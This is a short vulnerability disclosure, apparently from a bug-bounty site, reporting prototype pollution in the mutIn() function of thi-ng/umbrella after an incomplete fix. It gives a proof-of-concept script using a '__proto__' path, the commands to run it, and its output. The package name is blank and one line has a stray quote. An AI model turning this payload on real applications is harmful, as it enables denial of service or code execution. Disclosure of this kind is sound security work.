Prototype Pollution in thi-ng/umbrella


Reported on

Jan 26th 2021

Description is vulnerable to Prototype Pollution. The vulnerability is due to an incomplete fix. mutIn() function does not have fix implemented.

Proof of Concept

  1. Create the following PoC file:
// poc.js
const paths = require('')

console.log("Before: ", {}.polluted")
paths.mutIn({}, '__proto__.polluted', true)
console.log("After: ", {}.polluted)
  1. Execute the following commands in the terminal:
npm i # install vulnerable package
node poc.js # run the PoC
  1. Check the output:
Before: undefined
After: true


Prototype Pollution leads to Information Disclosure/DoS/RCE.

to join this conversation